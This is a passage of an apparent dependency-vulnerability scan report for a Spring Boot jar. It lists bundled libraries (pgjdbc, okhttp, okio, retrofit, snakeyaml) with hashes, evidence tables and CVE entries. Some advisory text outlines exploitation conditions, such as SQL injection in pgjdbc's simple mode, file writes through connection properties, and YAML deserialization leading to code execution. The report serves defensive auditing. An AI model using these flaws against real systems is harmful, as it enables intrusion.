SHA256: 8ca26cc39299a48edc9a4872600df56c94fb3c1f743936f7f3a3daf63e9237c3
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | okhttp-urlconnection | High
Vendor | jar | package name | internal | Low
Vendor | jar | package name | okhttp3 | Highest
Vendor | jar | package name | okhttp3 | Low
Vendor | pom | artifactid | okhttp-urlconnection | Low
Vendor | pom | groupid | com.squareup.okhttp3 | Highest
Vendor | pom | name | OkHttp URLConnection | High
Vendor | pom | parent-artifactid | parent | Low
Product | file | name | okhttp-urlconnection | High
Product | jar | package name | internal | Low
Product | jar | package name | okhttp3 | Highest
Product | pom | artifactid | okhttp-urlconnection | Highest
Product | pom | groupid | com.squareup.okhttp3 | Highest
Product | pom | name | OkHttp URLConnection | High
Product | pom | parent-artifactid | parent | Medium
Version | file | version | 3.3.1 | High
Version | pom | version | 3.3.1 | Highest
CVE-2018-20200
CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the application. NOTE: This id is disputed because some parties don't consider this a vulnerability. Their rationale can be found in https://github.com/square/okhttp/issues/4967
CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-0833
A flaw was found in Red Hat's AMQ-Streams, which ships a version of the OKHttp component with an information disclosure flaw via an exception triggered by a header containing an illegal value. This issue could allow an authenticated attacker to access information outside of their regular permissions.
CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3:
Base Score: MEDIUM (5.5)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: okio-1.8.0.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/okio-1.8.0.jar
MD5: c03069c230c7a7ebc7b1a3cd2df4d6b3
SHA1: 05ea7af56cc7c567ed9856d99efb30740e9b17ff
SHA256: 5cfea5afe6c6e441a4dbf6053a07a733b1249d1009382eb44ac2255ccedd0c15
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | okio | High
Vendor | jar | package name | okio | Highest
Vendor | jar | package name | okio | Low
Vendor | pom | artifactid | okio | Low
Vendor | pom | groupid | com.squareup.okio | Highest
Vendor | pom | name | Okio | High
Vendor | pom | parent-artifactid | okio-parent | Low
Product | file | name | okio | High
Product | jar | package name | okio | Highest
Product | pom | artifactid | okio | Highest
Product | pom | groupid | com.squareup.okio | Highest
Product | pom | name | Okio | High
Product | pom | parent-artifactid | okio-parent | Medium
Version | file | version | 1.8.0 | High
Version | pom | version | 1.8.0 | Highest
CVE-2023-3635
GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class.
CWE-195 Signed to Unsigned Conversion Error, CWE-681 Incorrect Conversion between Numeric Types
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: postgresql-42.2.2.jar (shaded: com.ongres.scram:client:1.0.0-beta.2)
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/postgresql-42.2.2.jar/META-INF/maven/com.ongres.scram/client/pom.xml
MD5: 6a4b184f3b8bf5c818dd05eb6993d59f
SHA1: 33634f5a6256d2149aeb052d554698cfdb8b19eb
SHA256: 1110d9b8d5b3f961abfb41fd10abbcc081d15c4aa83ccd1aa29369ba8604ee14
Evidence
Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | client | Low
Vendor | pom | groupid | com.ongres.scram | Highest
Vendor | pom | name | SCRAM - client | High
Vendor | pom | parent-artifactid | parent | Low
Product | pom | artifactid | client | Highest
Product | pom | groupid | com.ongres.scram | Highest
Product | pom | name | SCRAM - client | High
Product | pom | parent-artifactid | parent | Medium
Version | pom | version | 1.0.0-beta.2 | Highest
spring-music-sqldb-1.0.jar: postgresql-42.2.2.jar (shaded: com.ongres.scram:common:1.0.0-beta.2)
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/postgresql-42.2.2.jar/META-INF/maven/com.ongres.scram/common/pom.xml
MD5: 082e0e03a6ecbb961dca5b000df8d7e2
SHA1: ef98d7bc51a24f942b9ce52d5db3f75a3daf8466
SHA256: e405da7af7f33d41d4b76f0f0a3f427a65139de4abac79e21e92d4297d922dd1
Evidence
Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | common | Low
Vendor | pom | groupid | com.ongres.scram | Highest
Vendor | pom | name | SCRAM - common | High
Vendor | pom | parent-artifactid | parent | Low
Product | pom | artifactid | common | Highest
Product | pom | groupid | com.ongres.scram | Highest
Product | pom | name | SCRAM - common | High
Product | pom | parent-artifactid | parent | Medium
Version | pom | version | 1.0.0-beta.2 | Highest
spring-music-sqldb-1.0.jar: postgresql-42.2.2.jar
Description: Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database
License: BSD-2-Clause: https://jdbc.postgresql.org/about/license.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/postgresql-42.2.2.jar
MD5: aeaee2a456f269b49d78125d6f492f5d
SHA1: 7ebd60d15eec1f9e796d68212121d92e3dd566b2
SHA256: 1996524026a3027853f3932e8639ef813807d1b63fe14832f410fffa4274fa70
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | postgresql | High
Vendor | jar | package name | core | Highest
Vendor | jar | package name | driver | Highest
Vendor | jar | package name | jdbc | Highest
Vendor | jar | package name | postgresql | Highest
Vendor | Manifest | bundle-copyright | Copyright (c) 2003-2015, PostgreSQL Global Development Group | Low
Vendor | Manifest | bundle-docurl | https://jdbc.postgresql.org/ | Low
Vendor | Manifest | bundle-symbolicname | org.postgresql.jdbc42 | Medium
Vendor | Manifest | Implementation-Vendor | PostgreSQL Global Development Group | High
Vendor | Manifest | Implementation-Vendor-Id | org.postgresql | Medium
Vendor | Manifest | provide-capability | osgi.service;effective:=active;objectClass="org.osgi.service.jdbc.DataSourceFactory" | Low
Vendor | Manifest | specification-vendor | Oracle Corporation | Low
Vendor | pom | artifactid | postgresql | Low
Vendor | pom | groupid | org.postgresql | Highest
Vendor | pom | name | PostgreSQL JDBC Driver - JDBC 4.2 | High
Vendor | pom | organization name | PostgreSQL Global Development Group | High
Vendor | pom | organization url | https://jdbc.postgresql.org/ | Medium
Vendor | pom | parent-artifactid | pgjdbc-core-parent | Low
Vendor | pom | url | pgjdbc/pgjdbc | Highest
Product | file | name | postgresql | High
Product | jar | package name | core | Highest
Product | jar | package name | driver | Highest
Product | jar | package name | jdbc | Highest
Product | jar | package name | osgi | Highest
Product | jar | package name | postgresql | Highest
Product | Manifest | bundle-copyright | Copyright (c) 2003-2015, PostgreSQL Global Development Group | Low
Product | Manifest | bundle-docurl | https://jdbc.postgresql.org/ | Low
Product | Manifest | Bundle-Name | PostgreSQL JDBC Driver JDBC42 | Medium
Product | Manifest | bundle-symbolicname | org.postgresql.jdbc42 | Medium
Product | Manifest | Implementation-Title | PostgreSQL JDBC Driver - JDBC 4.2 | High
Product | Manifest | provide-capability | osgi.service;effective:=active;objectClass="org.osgi.service.jdbc.DataSourceFactory" | Low
Product | Manifest | specification-title | JDBC | Medium
Product | pom | artifactid | postgresql | Highest
Product | pom | groupid | org.postgresql | Highest
Product | pom | name | PostgreSQL JDBC Driver - JDBC 4.2 | High
Product | pom | organization name | PostgreSQL Global Development Group | Low
Product | pom | organization url | https://jdbc.postgresql.org/ | Low
Product | pom | parent-artifactid | pgjdbc-core-parent | Medium
Product | pom | url | pgjdbc/pgjdbc | High
Version | file | version | 42.2.2 | High
Version | Manifest | Bundle-Version | 42.2.2 | High
Version | Manifest | Implementation-Version | 42.2.2 | High
Version | pom | parent-version | 42.2.2 | Low
Version | pom | version | 42.2.2 | Highest
CVE-2022-26520 (OSSINDEX)
In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-26520 for details
CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.postgresql:postgresql:42.2.2:*:*:*:*:*:*:*
CVE-2022-21724
pgjdbc is the official PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when an attacker controls the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.
CWE-665 Improper Initialization
CVSSv3:
Base Score: CRITICAL (9.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5)
Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2024-1597
pgjdbc, the PostgreSQL JDBC Driver, allows an attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query, bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.28 are affected.
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: CRITICAL (9.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2018-10936
A weakness was found in postgresql-jdbc before version 42.2.5. It was possible to provide an SSL Factory and not check the host name if a host name verifier was not provided to the driver. This could lead to a condition where a man-in-the-middle attacker could masquerade as a trusted server by providing a certificate for the wrong host, as long as it was signed by a trusted CA.
CWE-297 Improper Validation of Certificate with Host Mismatch
CVSSv3:
Base Score: HIGH (8.1)
Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (6.8)
Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2022-31197
PostgreSQL JDBC Driver (PgJDBC for short) allows Java programs to connect to a PostgreSQL database using standard, database independent Java code. The PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user. User applications that do not invoke the `ResultSet.refreshRow()` method are not impacted. User applications that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name whose column names would contain the malicious SQL and subsequently invoke the `refreshRow()` method on the ResultSet. Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user. Patched versions will be released as `42.2.26` and `42.4.1`. Users are advised to upgrade. There are no known workarounds for this issue.
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: HIGH (8.0)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H/E:2.1/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2020-13692
PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE.
CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3:
Base Score: HIGH (7.7)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (6.8)
Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2022-41946
pgjdbc is an open source postgresql JDBC Driver. In affected versions a prepared statement using either `PreparedStatement.setText(int, InputStream)` or `PreparedStatement.setBytea(int, InputStream)` will create a temporary file if the InputStream is larger than 2k. This will create a temporary file which is readable by other users on Unix-like systems, but not MacOS. On Unix-like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. Because certain JDK file system APIs were only added in JDK 1.7, this fix is dependent upon the version of the JDK you are using. Java 1.7 and higher users: this vulnerability is fixed in 4.5.0. Java 1.6 and lower users: no patch is available. If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will mitigate this vulnerability.
CWE-668 Exposure of Resource to Wrong Sphere, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor, CWE-377 Insecure Temporary File
CVSSv3:
Base Score: MEDIUM (5.5)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: reactive-streams-1.0.2.jar
Description: A Protocol for Asynchronous Non-Blocking Data Sequence
License: CC0: http://creativecommons.org/publicdomain/zero/1.0/
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/reactive-streams-1.0.2.jar
MD5: 022ff8ca0101daeb35c8df9b120ff99e
SHA1: 323964c36556eb0e6209f65c1cef72b53b461ab8
SHA256: cc09ab0b140e0d0496c2165d4b32ce24f4d6446c0a26c5dc77b06bdf99ee8fae
Evidence
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | reactive-streams | Highest
Vendor | central | groupid | org.reactivestreams | Highest
Vendor | file | name | reactive-streams | High
Vendor | jar | package name | reactivestreams | Highest
Vendor | jar | package name | reactivestreams | Low
Vendor | Manifest | automatic-module-name | org.reactivestreams | Medium
Vendor | Manifest | bundle-docurl | http://reactive-streams.org | Low
Vendor | Manifest | bundle-symbolicname | org.reactivestreams.reactive-streams | Medium
Vendor | pom | artifactid | reactive-streams | Low
Vendor | pom | developer id | reactive-streams-sig | Medium
Vendor | pom | developer name | Reactive Streams SIG | Medium
Vendor | pom | groupid | org.reactivestreams | Highest
Vendor | pom | name | reactive-streams | High
Vendor | pom | url | http://www.reactive-streams.org/ | Highest
Product | central | artifactid | reactive-streams | Highest
Product | file | name | reactive-streams | High
Product | jar | package name | reactivestreams | Highest
Product | Manifest | automatic-module-name | org.reactivestreams | Medium
Product | Manifest | bundle-docurl | http://reactive-streams.org | Low
Product | Manifest | Bundle-Name | reactive-streams | Medium
Product | Manifest | bundle-symbolicname | org.reactivestreams.reactive-streams | Medium
Product | pom | artifactid | reactive-streams | Highest
Product | pom | developer id | reactive-streams-sig | Low
Product | pom | developer name | Reactive Streams SIG | Low
Product | pom | groupid | org.reactivestreams | Highest
Product | pom | name | reactive-streams | High
Product | pom | url | http://www.reactive-streams.org/ | Medium
Version | central | version | 1.0.2 | Highest
Version | file | version | 1.0.2 | High
Version | Manifest | Bundle-Version | 1.0.2 | High
Version | pom | version | 1.0.2 | Highest
spring-music-sqldb-1.0.jar: reactor-core-3.1.6.RELEASE.jar
Description: Non-Blocking Reactive Foundation for the JVM
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/reactor-core-3.1.6.RELEASE.jar
MD5: 454d0bf43d43a672d4158fd8a1f8b328
SHA1: 64dfad0f0a0e9022c949d678106d53f083b66d05
SHA256: 8d0b2eff83bf25724befe14744e463ff2bb5a1eb3af06f3b6b328fd6271fb0e4
Evidence
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | reactor-core | Highest
Vendor | central | groupid | io.projectreactor | Highest
Vendor | file | name | reactor-core | High
Vendor | jar | package name | core | Highest
Vendor | jar | package name | core | Low
Vendor | jar | package name | publisher | Low
Vendor | jar | package name | reactor | Low
Vendor | Manifest | bundle-symbolicname | io.projectreactor.reactor-core | Medium
Vendor | pom | artifactid | reactor-core | Low
Vendor | pom | developer email | akarnokd@gmail.com | Low
Vendor | pom | developer email | rsivaram@pivotal.io | Low
Vendor | pom | developer email | sbasle@pivotal.io | Low
Vendor | pom | developer email | sdeleuze@pivotal.io | Low
Vendor | pom | developer email | smaldini@pivotal.io | Low
Vendor | pom | developer id | akarnokd | Medium
Vendor | pom | developer id | rsivaram | Medium
Vendor | pom | developer id | sdeleuze | Medium
Vendor | pom | developer id | simonbasle | Medium
Vendor | pom | developer id | smaldini | Medium
Vendor | pom | developer name | David Karnok | Medium
Vendor | pom | developer name | Rajini Sivaram | Medium
Vendor | pom | developer name | Simon Baslé | Medium
Vendor | pom | developer name | Stephane Maldini | Medium
Vendor | pom | developer name | Sébastien Deleuze | Medium
Vendor | pom | groupid | io.projectreactor | Highest
Vendor | pom | name | Non-Blocking Reactive Foundation for the JVM | High
Vendor | pom | organization name | reactor | High
Vendor | pom | organization url | http://github.com/reactor | Medium
Vendor | pom | url | reactor/reactor-core | Highest
Product | central | artifactid | reactor-core | Highest
Product | file | name | reactor-core | High
Product | jar | package name | core | Highest
Product | jar | package name | core | Low
Product | jar | package name | publisher | Low
Product | jar | package name | reactor | Highest
Product | Manifest | Bundle-Name | reactor-core | Medium
Product | Manifest | bundle-symbolicname | io.projectreactor.reactor-core | Medium
Product | Manifest | Implementation-Title | reactor-core | High
Product | pom | artifactid | reactor-core | Highest
Product | pom | developer email | akarnokd@gmail.com | Low
Product | pom | developer email | rsivaram@pivotal.io | Low
Product | pom | developer email | sbasle@pivotal.io | Low
Product | pom | developer email | sdeleuze@pivotal.io | Low
Product | pom | developer email | smaldini@pivotal.io | Low
Product | pom | developer id | akarnokd | Low
Product | pom | developer id | rsivaram | Low
Product | pom | developer id | sdeleuze | Low
Product | pom | developer id | simonbasle | Low
Product | pom | developer id | smaldini | Low
Product | pom | developer name | David Karnok | Low
Product | pom | developer name | Rajini Sivaram | Low
Product | pom | developer name | Simon Baslé | Low
Product | pom | developer name | Stephane Maldini | Low
Product | pom | developer name | Sébastien Deleuze | Low
Product | pom | groupid | io.projectreactor | Highest
Product | pom | name | Non-Blocking Reactive Foundation for the JVM | High
Product | pom | organization name | reactor | Low
Product | pom | organization url | http://github.com/reactor | Low
Product | pom | url | reactor/reactor-core | High
Version | central | version | 3.1.6.RELEASE | Highest
Version | Manifest | Bundle-Version | 3.1.6.RELEASE | High
Version | Manifest | Implementation-Version | 3.1.6.RELEASE | High
Version | pom | version | 3.1.6.RELEASE | Highest
spring-music-sqldb-1.0.jar: retrofit-2.1.0.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/retrofit-2.1.0.jar
MD5: 9e42632359093667f096c532b1261eae
SHA1: 2de7cd8b95b7021b1d597f049bcb422055119f2c
SHA256: b7ae1a8c9f8de27c85ea43238c6c1507e91d33c6411cc52a06b5451842dc28bb
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | retrofit | High
Vendor | jar | package name | retrofit | Highest
Vendor | jar | package name | retrofit2 | Highest
Vendor | jar | package name | retrofit2 | Low
Vendor | pom | artifactid | retrofit | Low
Vendor | pom | groupid | com.squareup.retrofit2 | Highest
Vendor | pom | name | Retrofit | High
Vendor | pom | parent-artifactid | parent | Low
Product | file | name | retrofit | High
Product | jar | package name | retrofit | Highest
Product | jar | package name | retrofit2 | Highest
Product | pom | artifactid | retrofit | Highest
Product | pom | groupid | com.squareup.retrofit2 | Highest
Product | pom | name | Retrofit | High
Product | pom | parent-artifactid | parent | Medium
Version | file | version | 2.1.0 | High
Version | pom | version | 2.1.0 | Highest
CVE-2018-1000850
Square Retrofit versions from 2.0 (including) to 2.5.0 (excluding) contain a Directory Traversal vulnerability in the RequestBuilder class, method addPathParameter. By manipulating the URL an attacker could add or delete resources otherwise unavailable to her. This attack appears to be exploitable if an attacker has access to an encoded path parameter on a POST, PUT or DELETE request. This vulnerability appears to have been fixed in 2.5.0 and later.
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (6.4)
Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:P
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: rxjava-1.3.8.jar
Description: rxjava
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/rxjava-1.3.8.jar
MD5: 62b34782c8ce3462d5796da7c1e9a9b5
SHA1: 8c192792ad2e65a90867ab418ac49703f44d2baf
SHA256: 387df880f226b01cea4b1026d96d34e1da27d5801562742cfce0413c21ef7690
Evidence
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | rxjava | Highest
Vendor | central | groupid | io.reactivex | Highest
Vendor | file | name | rxjava | High
Vendor | jar | package name | internal | Low
Vendor | jar | package name | operators | Low
Vendor | jar | package name | rx | Low
Vendor | Manifest | branch | 7e3879abfb32eeebb38c970195a7f1e354eb1f82 | Low
Vendor | Manifest | build-date | 2018-03-31_15:30:39 | Low
Vendor | Manifest | build-host | travis-job-7634ec5f-11ac-4d0f-ac92-2fe172437739 | Low
Vendor | Manifest | build-job | LOCAL | Low
Vendor | Manifest | build-number | LOCAL | Low
Vendor | Manifest | built-os | Linux | Low
Vendor | Manifest | built-status | integration | Low
Vendor | Manifest | bundle-docurl | https://github.com/ReactiveX/RxJava | Low
Vendor | Manifest | bundle-symbolicname | io.reactivex.rxjava | Medium
Vendor | Manifest | change | 7e3879a | Low
Vendor | Manifest | module-email | benjchristensen@netflix.com | Low
Vendor | Manifest | module-origin | https://github.com/ReactiveX/RxJava.git | Low
Vendor | Manifest | module-owner | benjchristensen@netflix.com | Low
Vendor | Manifest | module-source |  | Low
Vendor | pom | artifactid | rxjava | Low
Vendor | pom | developer email | benjchristensen@netflix.com | Low
Vendor | pom | developer id | benjchristensen | Medium
Vendor | pom | developer name | Ben Christensen | Medium
Vendor | pom | groupid | io.reactivex | Highest
Vendor | pom | name | rxjava | High
Vendor | pom | url | ReactiveX/RxJava | Highest
Product | central | artifactid | rxjava | Highest
Product | file | name | rxjava | High
Product | jar | package name | internal | Low
Product | jar | package name | operators | Low
Product | Manifest | branch | 7e3879abfb32eeebb38c970195a7f1e354eb1f82 | Low
Product | Manifest | build-date | 2018-03-31_15:30:39 | Low
Product | Manifest | build-host | travis-job-7634ec5f-11ac-4d0f-ac92-2fe172437739 | Low
Product | Manifest | build-job | LOCAL | Low
Product | Manifest | build-number | LOCAL | Low
Product | Manifest | built-os | Linux | Low
Product | Manifest | built-status | integration | Low
Product | Manifest | bundle-docurl | https://github.com/ReactiveX/RxJava | Low
Product | Manifest | Bundle-Name | rxjava | Medium
Product | Manifest | bundle-symbolicname | io.reactivex.rxjava | Medium
Product | Manifest | change | 7e3879a | Low
Product | Manifest | Implementation-Title | io.reactivex#rxjava;1.3.8 | High
Product | Manifest | module-email | benjchristensen@netflix.com | Low
Product | Manifest | module-origin | https://github.com/ReactiveX/RxJava.git | Low
Product | Manifest | module-owner | benjchristensen@netflix.com | Low
Product | Manifest | module-source |  | Low
Product | pom | artifactid | rxjava | Highest
Product | pom | developer email | benjchristensen@netflix.com | Low
Product | pom | developer id | benjchristensen | Low
Product | pom | developer name | Ben Christensen | Low
Product | pom | groupid | io.reactivex | Highest
Product | pom | name | rxjava | High
Product | pom | url | ReactiveX/RxJava | High
Version | central | version | 1.3.8 | Highest
Version | file | version | 1.3.8 | High
Version | Manifest | Bundle-Version | 1.3.8 | High
Version | Manifest | Implementation-Version | 1.3.8 | High
Version | pom | version | 1.3.8 | Highest
spring-music-sqldb-1.0.jar: slf4j-api-1.7.25.jar
Description: The slf4j API
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/slf4j-api-1.7.25.jar
MD5: caafe376afb7086dcbee79f780394ca3
SHA1: da76ca59f6a57ee3102f8f9bd9cee742973efa8a
SHA256: 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | slf4j-api | High
Vendor | jar | package name | slf4j | Highest
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Vendor | Manifest | bundle-symbolicname | slf4j.api | Medium
Vendor | pom | artifactid | slf4j-api | Low
Vendor | pom | groupid | org.slf4j | Highest
Vendor | pom | name | SLF4J API Module | High
Vendor | pom | parent-artifactid | slf4j-parent | Low
Vendor | pom | url | http://www.slf4j.org | Highest
Product | file | name | slf4j-api | High
Product | jar | package name | slf4j | Highest
Product | Manifest | Bundle-Name | slf4j-api | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Product | Manifest | bundle-symbolicname | slf4j.api | Medium
Product | Manifest | Implementation-Title | slf4j-api | High
Product | pom | artifactid | slf4j-api | Highest
Product | pom | groupid | org.slf4j | Highest
Product | pom | name | SLF4J API Module | High
Product | pom | parent-artifactid | slf4j-parent | Medium
Product | pom | url | http://www.slf4j.org | Medium
Version | file | version | 1.7.25 | High
Version | Manifest | Bundle-Version | 1.7.25 | High
Version | Manifest | Implementation-Version | 1.7.25 | High
Version | pom | version | 1.7.25 | Highest
spring-music-sqldb-1.0.jar: snakeyaml-1.19.jar
Description: YAML 1.1 parser and emitter for Java
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/snakeyaml-1.19.jar
MD5: 95472b5a0ded8761545342a087e82117
SHA1: 2d998d3d674b172a588e54ab619854d073f555b5
SHA256: 0a7b1063fcaeb806b40b728d01b9361d38e1ed8deb93f945994fec7c1761dad1
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | snakeyaml | High
Vendor | jar | package name | emitter | Highest
Vendor | jar | package name | parser | Highest
Vendor | jar | package name | snakeyaml | Highest
Vendor | jar | package name | yaml | Highest
Vendor | Manifest | bundle-symbolicname | org.yaml.snakeyaml | Medium
Vendor | pom | artifactid | snakeyaml | Low
Vendor | pom | developer email | alexander.maslov@gmail.com | Low
Vendor | pom | developer email | jordanangold@gmail.com | Low
Vendor | pom | developer email | public.somov@gmail.com | Low
Vendor | pom | developer id | asomov | Medium
Vendor | pom | developer id | Jordan | Medium
Vendor | pom | developer id | maslovalex | Medium
Vendor | pom | developer name | Alexander Maslov | Medium
Vendor | pom | developer name | Andrey Somov | Medium
Vendor | pom | developer name | Jordan Angold | Medium
Vendor | pom | groupid | org.yaml | Highest
Vendor | pom | name | SnakeYAML | High
Vendor | pom | url | http://www.snakeyaml.org | Highest
Product | file | name | snakeyaml | High
Product | jar | package name | emitter | Highest
Product | jar | package name | parser | Highest
Product | jar | package name | snakeyaml | Highest
Product | jar | package name | yaml | Highest
Product | Manifest | Bundle-Name | SnakeYAML | Medium
Product | Manifest | bundle-symbolicname | org.yaml.snakeyaml | Medium
Product | pom | artifactid | snakeyaml | Highest
Product | pom | developer email | alexander.maslov@gmail.com | Low
Product | pom | developer email | jordanangold@gmail.com | Low
Product | pom | developer email | public.somov@gmail.com | Low
Product | pom | developer id | asomov | Low
Product | pom | developer id | Jordan | Low
Product | pom | developer id | maslovalex | Low
Product | pom | developer name | Alexander Maslov | Low
Product | pom | developer name | Andrey Somov | Low
Product | pom | developer name | Jordan Angold | Low
Product | pom | groupid | org.yaml | Highest
Product | pom | name | SnakeYAML | High
Product | pom | url | http://www.snakeyaml.org | Medium
Version | file | version | 1.19 | High
Version | pom | version | 1.19 | Highest
CVE-2022-1471
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
CWE-502 Deserialization of Untrusted Data, CWE-20 Improper Input Validation
CVSSv3:
Base Score: CRITICAL (9.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2017-18640
The Alias feature in SnakeYAML before 1.26 allows entity expansion during a load operation, a related issue to CVE-2003-1564.
CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CVSSv3:
